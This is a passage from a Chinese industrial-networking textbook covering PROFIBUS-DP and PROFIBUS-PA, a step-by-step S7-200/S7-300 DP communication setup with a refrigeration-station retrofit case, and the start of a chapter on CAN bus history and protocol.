US⁃DP技术准则2.082号。1)DPM1与从站间非循环数据传输。一类主站与从站间的非循环通信功能是通过附加的服务存取点SAP51执行的。在服务执行顺序中,DPM1与从站间建立的连接称为MSAC⁃C1,它与DPM1与从站间的循环数据传送紧密联系在一起,当连接点成功建立后,通过MSAC⁃C1连接进行非循环数据传送,如图6⁃9所示。2)报警响应。PROFIBUS⁃DP的基本功能允许从站通过诊断信息向主设备自发地传送事件,新的DDLM_Alarm_Ack功能提供了流控制,用于显示响应从DP从站上收到的报警数据。3)DPM2与从站间的扩展数据传送。PROFIBUS⁃DP扩展允许一个或几个诊断或操作员设备对从站的任何数据块进行非循环读/写服务,这是以连接为主进行的通信,这种连接称之为MSAC⁃C2。4.GSD文件生产厂商必须以电子设备数据库文件(GSD)方式描述不同厂商生产的PROFIBUS产品的功能参数(如I/O点数、诊断信息、传输速率和时间监视等),目的是为了将不同厂商生产的PROFIBUS产品集成在一起,如图6⁃10所示。标准的GSD数据将通信扩大到操作员控制级,使用根据GSD所做的组态工具可将不同厂商生产的设备集成在同一总线系统中。GSD文件可分为以下3个部分:1)总规范。包括生产厂商和设备名称、硬件和软件版本、传输速率、监视时间间隔和总线插头指定信号等。2)与PROFIBUS⁃DP主站有关的规范。包括适用于主站的各项参数,如允许从站个数、上载/下载能力等。3)与PROFIBUS⁃DP从站有关的规范。包括与从站有关的一切规范,如输入/输出通道数、类型和诊断数据等。5.行规PROFIBUS⁃DP行规规定了用户数据如何在总线各站之间进行传递,对用户数据的定义做了具体说明,并规定了应用领域,保证了不同厂商所生产设备的互换性。1)NC/RC行规(订单号:3.052)。说明了通过PROFIBUS⁃DP对操作和装配机器的控制方法。2)编码器行规(订单号:3.062)。说明了带单转或多转分辨率的旋转编码器、线性编码器与PROFIBUS⁃DP的连接。3)传动行规(订单号:3.071)。规定了调速设备如何参数化,以及如何传送设定值和实际值。4)操作员控制和过程监视(HMI)行规(订单号:3.082)。规定了操作员控制和过程监视设备如何通过网络连接到自动化设备上。6.S7⁃200接入PROFIBUS⁃DP网络PROFIBUS网络经过其DP通信端口,连接到EM277模块,该端口的通信速率支持9.6kbit/s~12Mbit/s。通过EM277模块,可将S7⁃200接入PROFIBUS⁃DP网络进行通信,EM277经过串行I/O总线连接到S7⁃200CPU。EM277模块在PROFIBUS网络中只能作为PROFIBUS从站。作为DP从站,EM277模块接收由主站提供多种不同的I/O配置,向主站发送和接收不同数据量的数据,这种特性使用户能修改所传输的数据量,以满足实际应用的需要。EM277模块不仅能传输I/O数据,还能读写S7⁃200CPU中定义的变量数据块,这是其与许多DP从站的不同之处,这种情况下,用户能与主站交换任何类型的数据。通信时,首先将数据移到S7⁃200CPU中的变量存储区,就可将输入、计数值、定时器值或其他计算值传送到主站。类似地,从主站来的数据存储在S7⁃200CPU中的变量存储区内,进而可移到其他数据区。EM277模块的DP端口可连接到网络上的一个DP主站上,但仍能作为一个MPI从站与同一网络上的其他主站(如SIMATIC编程器或S7⁃300/S7⁃400CPU等)进行通信。图6⁃11所示为一个PROFIBUS网络,图中CPU224通过EM277模块接入PROFIBUS网络,在这里,CPU315⁃2是DP主站,该主站已通过一个带有STEP7编程软件的SIMATIC编程器进行组态。CPU224是CPU315⁃2所拥有的一个DP从站,ET200I/O模块也是CPU315⁃2的从站。S7⁃400CPU连接到PROFIBUS网络,并且借助于S7⁃400CPU用户程序中的“X_GET”指令,可从CPU224中读取数据。6.5PROFIBUS⁃PAPROFIBUS⁃PA适用于过程自动化领域,它将自动化系统和过程控制系统与压力、湿度和液位变送器等现场设备连接起来,可用来替代直流4~20mA的模拟信号,二者的对比如图6⁃12所示。PROFIBUS⁃PA具有如下特性:1)适合过程自动化应用的行规,使不同厂商生产的现场设备具有互换性。2)添加和移除总线节点,即使在本质安全地区也不会影响到其他节点。3)在过程自动化的PROFIBUS⁃PA段与制造业自动化的PROFIBUS⁃DP总线段之间通过耦合器连接,并使之实现两段间的透明通信。4)使用与IEC61158⁃2技术相同的双绞线完成远程供电和数据传送。5)在潜在的爆炸危险区可使用防爆型“本质安全”或“非本质安全”。1.PROFIBUS⁃PA传输协议PROFIBUS⁃PA采用PROFIBUS⁃DP的基本功能来传送测量值和状态,并用扩展的PRO⁃FIBUS⁃DP功能来制定现场设备的参数和进行设备操作。PROFIBUS⁃PA中对应OSI参考模型的第1层采用IEC61158⁃2技术,第2层和第1层之间的接口在DIN19245系列标准的第4部分做了规定。2.PROFIBUS⁃PA行规PROFIBUS⁃PA行规保证了不同厂商所生产的现场设备的互换性和互操作性,图6⁃13所示是PROFIBUS⁃PA的一个组成部分。行规的任务是选用各种类型现场设备真正需要的通信功能,并提供这些设备功能和设备行为的一切必要规格,行规包括适用于所有设备类型的一般要求和用于各种设备类型配置信息的数据单。PROFIBUS⁃PA行规使用功能块模型,该模型也符合国际标准化。目前PROFIBUS⁃PA行规已对所有通用的测量变送器和其他选择的一些设备类型做了具体规定,包括压力、液位、温度和流量传感器、数字I/O、模拟量I/O、阀门和定位器等。图6⁃14所示为压力变送器的原理示意图。3.现场供电如图6⁃15所示,PROFIBUS⁃PA可对现场设备供电,但是要求总线电流小于120mA,每个现场设备保证不低于10mA。因此,对于爆炸危险区,一条总线上的设备数目不能超过10个,而对于非爆炸危险区则可达到30个。6.6PROFIBUS的应用6.6.1S7⁃200PLC与S7⁃300PLC之间总线通信的实现1.控制要求采用PROFIBUS⁃DP通信方式实现S7⁃200PLC和S7⁃300PLC之间的数据通信。S7⁃200PLC不支持DP通信协议,自身也不带PROFIBUS⁃DP接口,不能直接为从站,但可以通过添加EM277模块手动设置DP地址,将S7⁃200PLC作为从站连接到PROFIBUS⁃DP网络中。2.设备配置主站选择S7⁃300PLC的CPU314C⁃2DP。CPU314C⁃2DP控制器配置为DC24V、数字量24DI/16DO、模拟量5AI/2AO、FlashEPROM微存储器卡(MMC)、带有MPI接口和DP总线接口。电源模块选用PS3072A,硬件组态、参数配置及程序的编写在STEP7V5.3软件内完成。从站选择S7⁃200PLC的CPU226与EM277模块,将两个模块配合使用,通过EM277模块可将S7⁃200PLC连接到PROFIBUS⁃DP网络上。S7⁃200PLC的通信编程采用STEPMicro/Win4.0SP5软件完成,在通信中需要使用输入/输出缓冲区,该缓冲区在S7⁃200PLC的变量存储器V中。如图6⁃16所示,EM277通过串行I/O总线连接到CPU226的扩展口上,CPU314C⁃2DP上的DP口通过PROFIBUS⁃DP总线与EM277上的模块相连构成PROFIBUS网络,其中CPU314C⁃2DP作为系统的主站,完成组建网络的功能。EM277PROFIBUS⁃DP模块是智能模块,其EIA⁃485接口是隔离型的,端口波特率为9.6kbit/s~12Mbit/s,能自适应系统的通信速率。作为DP从站,EM277接收来自主站的I/O组态,向主站发送和接收数据,主站也可以读写S7⁃200PLC的V存储区,每次可以与EM277交换1~128B的信息。3.从站的设置PROFIBUS⁃DP的所有组态工作由主站完成,不需要在S7⁃200PLC一侧对PROFIBUS⁃DP通信组态和编程,只需将要通信的数据整理存放在主站组态时为其指定的V存储区地址图6⁃17设置从站地址里就可以了。从站主要是设置从站设备地址,该地址必须与主站中的组态地址相匹配。具体设置步骤如下:1)关闭模块的电源。2)在EM277上设置已经定义的PROFIBUS⁃DP地址。假设主站组态时将从站地址设为“3”,则转动图6⁃17中箭头所指的地址开关,使开关指向从站所需的数字“3”。3)打开模块电源。只有在重新打开电源之后,系统才能识别新设置的PROFIBUS⁃DP从站地址。4.主站的硬件组态(1)有关硬件组态在运行PROFIBUS系统之前,需要先对系统及各站点进行硬件配置和相关参数设置,即对系统进行硬件组态。这项工作可以由STEP7编程软件来实现,该软件集成了PROFIBUS系统中主要设备的所有通信功能。1)在STEP7编程软件中生成一个与实际硬件系统完全相同的系统,包括生成机架和模块、CPU型号/参数设置、网络参数设置、远程从站硬件配置、模块地址分配、主⁃从站数据传输时的输入/输出字(或字节)数及通信映像区地址和系统故障模式设定等内容。2)设置系统诊断。通过设置系统诊断,可以实现在线检测系统并找到故障点,进而读到故障的提示信息,可以通过两种方式显示信息。①快速浏览CPU的数据和用户编写的程序在运行中显示的故障原因。②用图形方式显示硬件配置(如模块的一般信息、模块的状态和模块的故障)以及诊断缓冲区的信息等。CPU也可以显示循环周期、已占用和未占用的存储区、通信的容量和利用率以及显示性能数据等众多信息。3)第三方设备集成及GSD文件。当PROFIBUS系统中需要使用第三方设备时,应该得到设备厂商提供的GSD文件,将GSD文件复制到STEP7或COMPROFIBUS软件指定目录下,使用STEP7或COMPROFIBUS软件可在用户界面指导下完成第三方产品在系统中的配置及参数设置等工作。(2)硬件组态的操作过程此处要完成的任务是对EM277和S7⁃300PLC构成的系统进行硬件配置、参数设置,然后在主站和从站之间组态数据通信。1)在SIMATIC管理器中创建一个新项目“EXAMPLE”,在新项目中插入一个S7⁃300PLC站和PROFIBUS⁃DP网络,如图6⁃18所示。图6⁃18创建一个新项目2)打开“HWConfig”编辑器,然后插入机架、电源和CPU314C⁃2DP,将CPU连接到PROFIBUS网络,如图6⁃19所示。图6⁃19硬件配置3)导入GSD文件,如图6⁃20所示。通过GSD文件将EM277集成到STEP7的硬件目录中(因为在默认情况下的硬件目录中不包含该硬件)。EM277的GSD文件名为“SIEM089D.GSD”,可以在SIMATIC客户支持网站下载。4)如图6⁃21所示,如果GSD文件安装成功,在右侧的设备选择列表中就可以找到EM277从站,路径为“PROFIBUSDP”→“AdditionalFieldDevices”→“PLC”→“SIMATIC”→“EM277PROFIBUS⁃DP”,根据通信字节数选择通信方式,在这里选择2字节输出/2字节输入的方式。5)将EM277模块添加到PROFIBUS⁃DP网段,然后设置该从站地址。软件组态的EM277PROFIBUS站地址要与实际EM277上的拨码开关设定的地址一致,根据EM277上的拨码开关设定从站的地址,组态地址也设为3,如图6⁃22所示。6)要完成主站和从站之间的数据通信,需要在通信两端为接收和发送数据定义地址区,在S7⁃200PLC中,这些区域位于变量存储区V中。在本例组态中,为接收和发送数据定义了2B长度的数据,已经选择的接收和发送地址区及数据交换的情况如图6⁃23所示。设定S7⁃300PLC的数据接收区地址为IB10和IB11,发送区地址为QB10和QB11,S7⁃200PLC的数据接收区地址为VB100和VB101,发送区地址为VB102和VB103。7)修改S7⁃300PLC的数据接收区和发送区的起始地址。此外,还要根据所选择的输入/输出模块,指定数据通信所使用的数据一致性的类型。8)打开EM277模块的属性对话框,然后通过参数V存储器中的I/O偏移指定接收区的起始地址(见图6⁃24),选择VB100作为起始地址。如果没有手动指定,则系统自动在接收区之后附加发送区。9)保存并编译组态文件,然后将组态下载到S7⁃300PLC中。5.运行结果VB100和VB101是S7⁃300PLC写到S7⁃200PLC的数据,其值对应于S7⁃300PLC的QB10~QB11;VB102~VB103是S7⁃300PLC从S7⁃200PLC读取的数据,其值对应于S7⁃300PLC的IB10~IB11。如果要把S7⁃200PLC的MB3的值传送给S7⁃300PLC的MB10,则应在S7⁃200PLC的程序中用MOVB指令将MB3传送到VB102~VB103中的某个字节中。通过通信,VB102的值传送给S7⁃300PLC的IB10,在S7⁃300PLC的程序中将IB10的值再传送给MB10。 6.注意事项1)在运行时,可以用STEP7的变量表和STEP7⁃Micro/Win的状态表来监控通信中交换的数据。2)在数据通信中,主站发送的数据存储在从站的接收区(变量存储区)中。S7⁃200PLC的用户程序必须将此数据“转移”到其他数据区中,否则这些数据将在下一次数据发送时被覆盖。3)在硬件组态中需要注意数据一致性问题。数据一致性是指在PROFIBUS⁃DP进行数据传输时,数据的各个部分不会割裂开来传输,保证同时更新,即字节一致性保证字节作为整个单元传送,字一致性保证组成字的两个字节一起传送,缓冲区一致性保证数据的整个缓冲区作为一个整体一起传送。6.6.2PROFIBUS在制冷站监控系统中的应用本节介绍的基于PROFIBUS的监控系统是对原工厂制冷站监控系统的技术改造与产品升级,由此可以看出,现场总线控制系统(FCS)不但可以设计复杂的现代控制系统,而且可以用于对传统集散控制系统(DCS)的技术改造。FCS与DCS的区别重点不是硬件设备(在一定程度上其设备甚至可以通用),而是设计思想,FCS采用不同于DCS的彻底分散化、数字化的控制思想。通过本节的介绍还可以发现FCS也是可以具有层次结构的,一个单元节点可以是上层总线系统的节点,同时也是一个底层总线系统。该处提到的AS⁃i总线是一种比PROFIBUS更简便、更底层的总线系统,本书第8章会对其做详细介绍。1.系统概述制冷站主要用于夏季为某企业的生产车间提供保持恒温的冷气,该企业动力车间的制冷站设备包括4台蒸汽型吸收式制冷机、6台132kW冷却水泵、3座冷却塔和两台补水泵。系统自安装运行以来,一直未进行技术改造和升级,现有控制系统特别是其监控系统设备已经严重老化,维护保养困难,故障率不断升高,系统急需升级改造。目前,系统有两种可行的改造方案,一种是按照以往的信号采集和控制方式进行系统更新,另一种是利用总线技术完成信号采集和各种动作的执行,前者是典型的集散控制系统(DCS),而后者是现场总线控制系统(FCS)。前者改造风险较小,但是采用传统的单线方式实现信号采集和传输,信号线路密集,控制比较集中,系统较为复杂,维护较为烦琐。鉴于此,本节采用总线技术对系统进行改造,使其更好地实现信号的全方位采集,不但使集中和分散控制兼顾,而且还可以实现企业信息的集成。2.系统网络架构本系统的核心设备是4台大型制冷机,每台设备需要监测的工艺参数有近60个。另外,在冷冻水、冷却水和冷却塔等管路上,有温度、压力、水位、流量等检测信号50多个,这些信号分布在300m左右的范围内,比较分散。考虑到现场实际情况,采用基于PROFIBUS现场总线技术的现场总线控制系统(FCS)进行制冷站的技术升级改造。控制系统的网络架构如图6⁃25所示。4台制冷机各自作为一个从站,即4#~7#,制冷机的控制系统为早期研发的产品,不能直接连接到PROFIBUS⁃DP网络,需增加配置原有系统的通信模块,结合德国赫优讯(Hilscher)公司的NT30总线桥,通过Modbus/PROFIBUS总线转换模块进行数据转换,方可将其接入PROFIBUS网络。系统原有的压力、温度等传感器信号,并未配置标准信号变送器,本次系统改造将原有传感器更换为德国E+H公司的温度、压力及流量标准信号传感器和变送器,从而实现对制冷站控制系统基础模拟信号的采集。这些信号大多分布在制冷机车间的管路上,依据就近原则,可以将它们集成在现场的8#从站,进行信号采集。现场蒸汽的温度、压力、瞬时流量和累计流量信号的采集采用原有设备,其二次仪表可动态显示上述数据,本项目在二次仪表上添加通信功能模块,使其接入PROFIBUS网络,实现数据读取,该从站为3#。控制室设有一个主站(1#)和一个从站(2#),主站和从站结构基本相同,所连接设备也相同,从站作为主站的安全备份。二者唯一的区别是主站通过工业以太网(PROFINET)与系统上层连接,操作员站通过网关和整个监控系统相连。1#和2#站中接入的大部分信号都是控制水泵软起动器、冷却塔、补水泵以及手动控制使用的开关量信号,主站和备份从站都是由一个基于AS⁃i的总线系统构成,该AS⁃i总线网络作为PROFIBUS网络的子网络存在。3.关键技术制冷站监控系统改造的关键技术集中在3个环节,分别是实现冷冻水循环系统的智能控制,通信模块的选用和全面统计循环泵、制冷机、冷却塔、补水泵和控制系统等设备的耗电量并进行分析。本监控系统的控制采用模糊控制,由于智能控制与功耗分析非本节核心,故只对通信模块的选用进行介绍。现场的制冷机采用蒸汽式溴化锂制冷机,选用具有Modbus通信协议的通信模块来读取制冷机内部参数。另外,系统中蒸汽的温度、压力、瞬时流量和累计流量信号的采集采用西比克(Ceebic)公司的二次仪表,将仪表增配EIA⁃485接口,采用EIA⁃485/PROFIBUS的转换模块实现网络连接。目前市场上有多款总线桥产品用于实现串口通信设备与总线网络的挂接,但是不同类型及厂商的产品其性能、可靠性及使用便利性等方面存在诸多差异。在分析和试用多个总线桥产品后,选用了赫优讯公司的NT30总线桥作为Modbus和EIA⁃485串口通信的总线转换设备,使用NTDPSMBR.N34和NTDPSASC.N34这2个固件分别实现网络与三洋制冷机的Modbus通信及与Ceebic公司二次仪表EIA⁃485的数据通信。NT30总线桥具有指令自动发送和数据自动接收功能,需要注意的是,Modbus有多种通信指令,而设备厂商在定义数据读取时和总线桥的格式有所关联,使用NT30总线桥进行通信时要注意位信息的读取和操作,其“.coil”位一定不能写成0,而是用1~16来表示1个存储空间的16个位信息。4.上位机系统上位机监控系统采用西门子WinCC软件进行开发,开机后自动进入制冷站监控系统的主监控画面,系统能实时显示各种设备的运行参数、运行状态和故障信息。对制冷设备的历史数据记录采用棒图和曲线图相结合的显示方法,数据保存周期在2年以上,对制冷系统的运行能耗数据、能耗趋势,不仅能实时分析和显示,而且还能进行历史数据查询和报表打印。在远程手动模式下,可以对现场所有设备进行远程手动操作,通过单击画面设备图案能弹出设备控制子窗口,单击按钮即可控制现场设备的起停。制冷系统具有故障自诊断和报警功能,报警信息包含机组编号、位置、故障发生日期和时间等。运行系统涵盖了完整详细的帮助系统,以方便操作人员快速熟悉常见和重要操作的详细流程、操作方法以及常见事故的处理方法等。 第7章CAN总线技术 控制器局域网(ControllerAreaNetwork,CAN)总线技术是德国罗伯特·博世(RobertBosch)公司(以下简称博世公司)为解决现代汽车内部众多测量控制部件之间的数据交换问题,于1986年开发出的串行数据通信现场总线。与传统硬接线方式相比,CAN总线可以采用较少的信号线来连接汽车上各种电子设备,减少了安装和维护成本,同时增强了数据传输的可靠性。CAN总线为串行通信协议,能有效地支持具有很高安全等级的分布实时控制。CAN总线的应用范围很广,从高速的网络到低价位的多路配线都可以使用。在汽车电子行业里,使用CAN总线连接发动机控制单元、传感器和防滑系统等,其传输速率可达1Mbit/s。同时,可以将CAN总线安装在汽车本体的电子控制系统里,如车灯组、电气车窗等,用以代替接线配线装置。CAN总线的高性能和可靠性已被认同,并被广泛地应用在工业自动化、船舶、医疗设备、工业设备等方面。7.1CAN总线简介7.1.1CAN总线的发展历程1.从理论到第一块芯片早在20世纪80年代初,博世公司的工程人员就在探讨将现有的串行总线系统运用于轿车的可能性,因为还没有一个网络协议能够完全满足汽车工程的要求。1983年,UweKiencke开始设计一个新的串行总线系统,新的总线协议受支持,主要是因为增加了新的功能,减少了导线的用量。这仅仅是从产品的角度来看的,但它不是推动CAN发展的动力,梅赛德斯⁃奔驰(Mercedes⁃Benz)公司的工程人员早就介入到这个新总线系统的规范制定之中,作为主要的半导体厂商,Intel公司也介入其中。德国布伦瑞克/沃尔芬比特(Braun⁃schweig/WolfenbüttelFH)应用技术大学的教授Dr.WolfhardLawrenz作为顾问,他给这个新的网络协议起名为“控制器局域网(ControllerAreaNetwork)”,Karlsruhe大学教授HorstWettstein博士提供了理论上的帮助。1986年2月的机动车工程师学会(SAE)大会上,博世公司提出了CAN总线技术。这个由博世公司设计的新的总线系统,称为“汽车串行控制局域网”(AutomotiveSerialControllerAreaNetwork),这是一个最成功的网络协议诞生的时刻。如今,几乎每一辆欧洲生产的新轿车至少装配有一个CAN网络系统。CAN也应用在火车、轮船等其他类型的运输工具以及工业控制方面。CAN是最主要的总线协议之一,它有可能引导世界范围的串行总线系统。仅在1999年,就有近6000万个CAN控制器投入使用,2000年销售了1亿多个CAN芯片。这是个多主网络协议,其基础是非破坏性仲裁机制,没有中心总线主设(CentralBusMaster),这使得总线能以最高优先权没有任何延时地访问报文。除上述所提之外,CAN的创始者还有博世公司的人员WolfgangBorst、WolfgangBotzenhard、OttoKarl、HelmutSchelling和JanUnruh,他们提出了几类错误检测机制,对错误的处理包括自动断开有问题的总线节点使其余节点之间的通信继续进行。同时,用发送器或接收器的内容作为被传送报文的身份标识,而不是用它们的节点地址。标识作为报文的一部分,同时也具有确定报文在这个系统中的优先级的功能。此后,对于该改进的通信协议出现了许多发表在出版物上的介绍。直到1987年,比原预定时间提前两个月,Intel公司推出了第一片CAN控制芯片———Intel82526,它是CAN协议第一个在硬件上的实现。仅仅用了4年时间,理论就变成了现实。不久以后,飞利浦半导体公司推出了PCA82C200。在考虑验收过滤和报文处理方面,这两种早先的CAN控制器芯片完全不同。一方面,Intel公司的FullCAN比飞利浦半导体公司的BasicCAN对相连的微控制器方CPU的干预较小;另一方面,FullCAN装置对可接收的报文数目有限制,而Basic⁃CAN控制器的硅片较小。如今,在这些新生代的CAN控制器中,它们以同样的模式执行着不同概念的验收过滤和报文处理。2.标准化和一致性20世纪90年代初,博世CAN规范(2.0版)提交作为国际标准。经过几次争论,特别是又有了几个法国主要轿车制造厂提出的“交通工具局域网”(VehicleAreaNetwork,VAN)后,1993年11月,ISO便公布了CAN的ISO11898标准。同时,CAN协议中定义了物理层的波特率最高为1Mbit/s。另外,CAN数据传送中的错误处理方式也在1995年的ISO11519⁃2中标准化,ISO11898标准也由于加入了描述29位CAN的标识符而得到扩充,不足之处是所有公布的CAN规范和标准都有错误和不完整的地方。为了避免CAN在使用过程中的不兼容问题,博世公司保证所有CAN芯片都要遵照博世CAN的参考模式。此外,在德国布伦瑞克/沃尔芬比特应用技术大学,由Lawrenz教授牵头,几年来一直在进行CAN的一致性测试,这些测试方案是根据国际标准化测试规范ISO16845制定的。如今,CAN规范的标准化正在修改过程中。ISO11898⁃1描述了“CAN数据链路层”,ISO11898⁃2定义了“无错误⁃误差CAN物理层”,ISO11898⁃3规定了“错误⁃误差物理层”。ISO11992(卡车和拖车的接口)和ISO11783(农业和林业机械)定义了以CAN为基础的应用条款,其依据是SAEJ1939。3.CAN的前景CAN协议颁布至今已有几十年,但它仍然在发展完善。2000年初,ISO的任务是要求有关的几个公司定义一项用于CAN报文的时间⁃触发传输(Time⁃triggeredTransmission)的协议。BerndMueller博士和ThomasFuehrer以及博世公司的其他人员同来自半导体工业和学院的专家一起定义“CAN的时间⁃触发通信”协议(TTCAN),计划将其国际标准化为ISO11898⁃4。这个CAN的扩展现在正在硅片上进行,它不仅允许用CAN作时间等间距传送报文和封闭控制循环,也允许在X⁃by⁃Wire中使用CAN。因为CAN的协议没有变,所以可以利用同样的物理总线发送时间触发报文和事件触发报文。TTCAN的扩展增强了CAN的生命力。考虑到CAN还处在全球市场渗透的初期,即使是保守的估计,也表明在今后10~15年里有很大的发展空间。要强调的是,今后几年美国和远东地区汽车制造业中,会在一系列运输工具上使用CAN。另外,还在进行新的潜在的大量应用(例如娱乐业),这不仅表现在轿车方面,也表现在家电领域。为了正式批准各种不同的安全考虑和安全临界应用,还要解决几个高层协议方面的问题。德国工业安全专业协会(BIA)和德国安全标准机构(TüV)已经确定基于CAN的一些现有的安全系统。CANopen协议是第一个得到BIA试验性批准的标准CAN解决方案,DeviceNet紧跟其后。针对海事应用的CANopen结构的批准正在进行中,它是由德国劳氏船级社制定的,这个规范定义了从CANopen网络到冗余总线系统的自动转换。7.1.2CAN总线的特点由于CAN总线本身的特点,其应用范围目前已不再局限于汽车行业,而是扩展到了机械工业、纺织机械、农用机械、机器人、数控机床、医疗机械、家用电器及传感器等领域。CAN已经形成国际标准,并已被公认为是几种最有前途的现场总线之一。由于采用了许多新技术及独特的设计,CAN总线与一般的通信总线相比,它的数据通信具有突出的可靠性、实时性和灵活性。其特点可概括如下:1)CAN是最早成为国际标准的现场总线之一。2)CAN为多主方式工作,网络上任一节点均可在任意时刻主动地向网络上其他节点发送信息,而不分主从。3)在报文标识符上,CAN上的节点分成不同的优先级,可满足不同的实时要求,优先级高的数据最多可在134μs内得到传输。4)CAN采用非破坏性总线仲裁技术。当多个节点同时向总线发送信息而出现冲突时,优先级较低的节点会主动地退出发送,而最高优先级的节点可不受影响继续传输数据,从而大大节省了总线冲突仲裁时间,尤其是在网络负载很重的情况下,也不会出现网络瘫痪的情况(以太网则可能)。5)CAN节点只需通过对报文的标识符滤波即可实现点对点、一点对多点及全局广播等几种方式传送接收数据。6)CAN的直接通信距离最远可达10km(速率在5kbit/s以下),通信速率最高可达1Mbit/s(此时通信距离最长为40m)。7)CAN上的节点数主要取决于总线驱动电路,目前可达110个。在标准帧报文标识符有11位,而在扩展帧的报文标识符(29位)的个数几乎不受限制。8)报文采用短帧结构,传输时间短,受干扰概率低,数据出错率极低。9)CAN的每帧信息都有CRC及其他检错措施,具有极好的检错效果。10)CAN的通信介质可为双绞线、同轴电缆或光纤,选择灵活。11)CAN节点在错误严重的情况下具有自动关闭输出功能,以使总线上其他节点的操作不受影响。7.1.3CAN总线的位数值表示与通信距离CAN总线上用“显性”(Dominant)和“隐性”(Recessive)两个互补的逻辑值表示“0”和“1”。当在总线上出现同时发送显性和隐性位时,其结果是总线数值为显性(“0”与“1”的结果为“0”),如图7⁃1所示,VCAN⁃H和VCAN⁃L为CAN总线收发器与总线之间的两接口引脚的电压,信号是以两线之间的“差分”电压形式出现的。在隐性状态,VCAN⁃H和VCAN⁃L被固定在平均电压电平附近,Vdiff近似于0。在总线空闲或隐性位期间,发送隐性,显性位以大于最小阈值的差分电压表示。CAN总线上任意两个节点之间的最大传输距离与其位速率有关,见表7⁃1。这里的最大通信距离是指在同一条总线上两个节点之间的距离。 7.2CAN技术规范随着CAN的广泛应用,对其技术规范的标准化提出了要求。为此,1991年9月飞利浦半导体公司发布了CAN规范V2.0(CANSpecificationVersion2.0)。CAN规范V2.0包括A和B两部分,CAN规范V2.0A沿用了曾在CAN规范V1.2中定义的CAN报文格式,V2.0B给出了标准和扩展两种报文格式,CAN规范V1.2中定义的CAN报文格式在V2.0B中称为报文的标准格式。1993年11月,ISO正式将CAN规范颁布为道路交通运输工具—数字信息交换—高速通信控制器局域网国际标准,即ISO11898。除了CAN规范本身外,CAN的一致性测试也被定义为ISO16845标准,用于描述CAN芯片的互换性。制定CAN规范的目的是为了在CAN总线上的任意两个节点间建立兼容性。CAN规范主要描述了物理层和数据链路层,CAN总线上的设备既可与V2.0A规范兼容,也可与V2.0B规范兼容。7.2.1CAN技术基础1.CAN协议CAN协议是建立在国际标准化组织的开放系统互联模型基础上的。不过其模型结构只有3层,即只取OSI底层的物理层、数据链路层和应用层。由于CAN的数据结构简单,又是范围较小的局域网,因此不需要其他中间层,应用层数据直接取自数据链路层或直接向链路层写数据,结构层次少,有利于系统中实时控制信号的传送。本技术规范的目的是为了在任意两个CAN器件之间建立兼容性。可是,兼容性有不同的方面,比如电气特性和数据转换的解释。为了达到设计的透明度以及实施的灵活性,根据ISO/OSI参考模型,CAN被细分为不同的层次,如图7⁃2所示。 (1)数据链路层(DLL)数据链路层含以下两个子层:1)逻辑链路控制(LLC)子层。逻辑链路控制子层涉及报文滤波、过载通知和恢复管理。2)介质访问控制(MAC)子层。介质访问控制子层是CAN协议的核心。它把接收到的报文提供给LLC子层,并接收来自LLC子层的报文。MAC子层负责报文分帧、仲裁、应答、错误检测和标定,它也受一个名为“故障界定”(FaultConfinement)的管理实体监管。此故障界定为自检机制,以便把永久故障和短时扰动区别开来。(2)物理层(PhysicalLayer)物理层定义信号是如何实际传输的,因此涉及位定时、位编码/解码及同步的解释。本技术规范没有定义物理层的驱动器/接收器特性,以便允许根据它们的应用,对发送媒体和信号电平进行优化。在CANV2.0A规范中,数据链路层的LLC子层和MAC子层的服务及功能分别被解释为“目标层”和“传输层”。逻辑链路控制(LLC)子层的作用范围如下:1)为远程数据请求以及数据传输提供服务。2)确定LLC子层接收的报文中哪些报文实际上被验收。3)为恢复管理和过载通知提供手段。介质访问控制(MAC)子层的作用主要是传送规则,也就是控制帧的结构、执行仲裁、错误检测、错误标定(ErrorCalibration)和故障界定。总线上什么时候开始发送新报文及什么时候开始接收报文,均在MAC子层里确定。位定时(BitTiming)的一般功能也可以看作是MAC子层的一部分,显然,对于MAC子层是不允许修改的。物理层的作用是在不同节点之间根据所有的电气属性进行位的实际传输。同一网络的物理层对于所有节点当然是相同的,尽管如此,在选择物理层方面还是很自由。2.基本概念CAN具有以下特性:报文的优先权;保证延迟时间;设置灵活;时间同步的多点接收;系统内数据的一致性(SystemWideDataConsistency);多主机(对等);错误检测和错误标定;只要总线处于空闲,就自动将破坏的报文重新传输;将节点的暂时性错误和永久性错误区分开来,并且可以自动关闭CAN的错误节点。(1)报文(Messages)总线上的信息以几个不同的固定格式的报文发送,但长度受限。当总线空闲时,任何连接的单元都可以开始发送新的报文。(2)信息路由(InformationRouting)在CAN系统里,CAN的节点不使用任何关于系统结构的信息。以下是与此有关的几个重要概念。1)系统灵活性。不需要应用层以及任何节点软件和硬件的任何改变,就可以在CAN网络中直接添加节点。2)报文路由。报文的寻址内容由标识符指定,标识符不指出报文的目的地,但是这个数据的特定含义使得网络上所有的节点可以通过报文滤波来判断该数据是否与它们相符合。3)多点传送(Multicast)。由于报文滤波的作用,任何数目的节点对同一条报文都可以接收并同时对此做出反应。4)数据一致性(Consistency)。在CAN网络里确保报文同时被所有的节点接收,系统的这种数据一致性是靠多点传送和错误处理的功能来实现的。(3)位速率(BitRate)在一个给定的CAN系统里,位速率是唯一且固定的。(4)优先权(Priorities)报文中数据帧和远程帧都有标识符段,在访问总线期间,标识符确定了一个静态的(固定的)报文优先权。当多个CAN单元同时传输报文发生总线冲突时,标识符码值越小的报文优先级越高。(5)远程数据请求(RemoteDataRequest)通过发送远程帧,需要数据的节点可以请求另一节点发送相应的数据帧。数据帧和相应的远程帧具有相同的标识。(6)主机(Multimaster)总线空闲时,任何单元都可以开始传送报文。具有较高优先权报文的单元可以获得总线访问权。(7)仲裁(Arbitration)只要总线空闲,任何单元都可以开始发送报文。如果两个或两个以上的单元同时开始传送报文,那么就会有总线访问冲突,通过使用标识符的逐位仲裁可以解决这个冲突。仲裁机制确保了报文和时间均不损失。当具有相同标识符的数据帧和远程帧同时发送时,数据帧优先于远程帧。在仲裁期间,每一个发送器都对发送位的电平与被监控的总线电平进行比较,如果电平相同,则这个单元可以继续发送;如果发送的是一“隐性”电平而监视到的是一“显性”电平,那么这个单元就失去了仲裁,此时必须退出发送状态。(8)安全性(Safety)为了获得最安全的数据发送,CAN的每一个节点均采取了强有力的措施来进行错误检测、错误标定及错误自检。1)错误检测(ErrorDetection)。要进行错误检测,必须采取以下措施: 